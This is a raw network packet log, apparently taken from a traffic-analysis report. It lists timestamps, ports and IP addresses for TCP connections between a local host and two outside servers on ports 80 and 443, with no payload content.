Sep 2, 2024 08:21:04.828443050 CEST	80	49737	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:04.828577995 CEST	49737	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:04.828788042 CEST	49737	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:04.828809023 CEST	49737	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:04.833597898 CEST	80	49737	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:04.834192991 CEST	80	49737	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:05.996436119 CEST	80	49737	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:05.996464014 CEST	80	49737	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:05.996541977 CEST	49737	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:05.996701956 CEST	49737	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:05.999905109 CEST	49738	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:06.001486063 CEST	80	49737	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:06.005131006 CEST	80	49738	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:06.005259991 CEST	49738	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:06.005374908 CEST	49738	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:06.005395889 CEST	49738	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:06.010179996 CEST	80	49738	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:06.010191917 CEST	80	49738	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:07.153987885 CEST	80	49738	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:07.154135942 CEST	80	49738	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:07.154201984 CEST	49738	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:07.159534931 CEST	49738	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:07.164393902 CEST	80	49738	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:07.269273043 CEST	49739	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:07.275194883 CEST	80	49739	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:07.275296926 CEST	49739	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:07.275456905 CEST	49739	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:07.275480032 CEST	49739	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:07.280256033 CEST	80	49739	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:07.280292988 CEST	80	49739	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:08.487118959 CEST	80	49739	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:08.487159967 CEST	80	49739	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:08.487169981 CEST	80	49739	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:08.487206936 CEST	49739	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:08.487246037 CEST	49739	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:08.487334013 CEST	49739	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:08.489856005 CEST	49741	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:08.496992111 CEST	80	49739	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:08.497509003 CEST	80	49741	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:08.497571945 CEST	49741	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:08.497749090 CEST	49741	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:08.497760057 CEST	49741	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:08.502545118 CEST	80	49741	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:08.502758026 CEST	80	49741	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:09.643055916 CEST	80	49741	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:09.644061089 CEST	80	49741	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:09.644123077 CEST	49741	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:09.644177914 CEST	49741	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:09.646534920 CEST	49742	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:09.648979902 CEST	80	49741	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:09.651376009 CEST	80	49742	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:09.651460886 CEST	49742	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:09.651580095 CEST	49742	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:09.651602983 CEST	49742	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:09.656383991 CEST	80	49742	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:09.656395912 CEST	80	49742	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:11.300154924 CEST	80	49742	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:11.300421953 CEST	80	49742	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:11.300473928 CEST	49742	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:11.300534964 CEST	49742	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:11.303054094 CEST	49743	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:11.305318117 CEST	80	49742	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:11.307926893 CEST	80	49743	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:11.307998896 CEST	49743	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:11.308118105 CEST	49743	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:11.308139086 CEST	49743	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:11.605308056 CEST	49743	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:11.847007036 CEST	80	49743	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:11.847027063 CEST	80	49743	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:11.848867893 CEST	80	49743	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:12.689039946 CEST	80	49743	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:12.689063072 CEST	80	49743	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:12.689150095 CEST	49743	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:12.689342976 CEST	49743	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:12.694048882 CEST	80	49743	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:12.777009964 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:12.777071953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:12.777194023 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:12.777601004 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:12.777612925 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.242434025 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.242645979 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.244191885 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.244205952 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.244448900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.255999088 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.300503969 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.363614082 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.363673925 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.363709927 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.363740921 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.363751888 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.363790989 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.363804102 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.364160061 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.364207983 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.364214897 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.364355087 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.364387035 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.364398956 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.364404917 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.364442110 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.364448071 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.365303993 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.365340948 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.365353107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.365360975 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.365411043 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.430742025 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446064949 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446095943 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446126938 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446154118 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.446156979 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446170092 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446224928 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.446777105 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446831942 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446870089 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446897984 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446922064 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.446968079 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.446980953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.447024107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.447586060 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.447722912 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.447751999 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.447767973 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.447776079 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.447803020 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.447824955 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.447833061 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.447874069 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.448601007 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.448663950 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.448697090 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.448714018 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.448720932 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.448748112 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.448765993 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.448771954 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.448815107 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.449544907 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.487330914 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.487363100 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.487430096 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.487447977 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.487498045 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.528825045 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.528858900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.528887033 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.528899908 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.528915882 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.528928041 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.529267073 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.529310942 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.529319048 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.529355049 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.530081034 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.530107021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.530128002 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.530133963 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.530144930 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.530155897 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.530179977 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.530184031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.530205011 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.530684948 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.530720949 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.530729055 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.530740976 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.530764103 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.531527042 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.531577110 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.531584978 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.531636000 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.531640053 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.531650066 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.531686068 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.531689882 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.531699896 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.531758070 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.532670021 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.532713890 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.532742023 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.532747984 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.532759905 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.532799959 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.574542046 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.574635029 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.596031904 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.596138000 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.611540079 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.611603022 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.611794949 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.611844063 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.612015963 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.612067938 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.612438917 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.612498045 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.612507105 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.612520933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.612552881 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.612597942 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.612642050 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.612653017 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.612693071 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.613373995 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.613423109 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.613447905 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.613495111 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.613500118 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.613512993 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.613548040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.614375114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.614427090 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.614434004 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.614475012 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.614567041 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.614614964 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.614624023 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.614638090 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.614656925 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.614675999 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.615288019 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.615334034 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.615406036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.615443945 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.615446091 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.615459919 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.615485907 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.616281033 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.616333961 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.616345882 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.616380930 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.616396904 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.616403103 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.616422892 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.616511106 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.616554022 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.616560936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.616600990 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.617271900 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.617326975 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.617383957 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.617424965 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.617430925 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.617444038 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.617463112 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.618242979 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.618297100 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.618305922 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.618313074 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.618341923 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.618344069 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.618385077 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.618391991 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.618427992 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.619241953 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.619292021 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.619306087 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.619344950 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.619395018 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.619400024 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.619436979 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.620280027 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.620326996 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.620332956 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.620377064 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.657111883 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.657171011 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.678631067 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.678674936 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.678704023 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.678740025 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.678761005 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697035074 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697076082 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697093964 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697120905 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697143078 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697144985 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697191954 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697196007 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697204113 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697228909 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697238922 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697276115 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697278976 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697287083 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697318077 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697329044 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697365046 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697365999 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697376966 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697405100 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697413921 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697448015 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697449923 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697457075 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697494984 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697500944 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697534084 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697607040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697607040 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697616100 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697633982 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697674036 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697674036 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697685003 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697731972 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697773933 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697828054 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697849035 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.697856903 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.697869062 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.698012114 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.698045969 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.698055983 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.698064089 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.698077917 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.698091030 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.698112965 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.698117018 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.698137045 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.698151112 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.698158979 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.698180914 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.698259115 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.706202984 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.706238031 CEST	443	49744	84.32.84.152	192.168.2.6
Sep 2, 2024 08:21:13.706255913 CEST	49744	443	192.168.2.6	84.32.84.152
Sep 2, 2024 08:21:13.706267118 CEST	443	49744	84.32.84.152	192.168.2.6
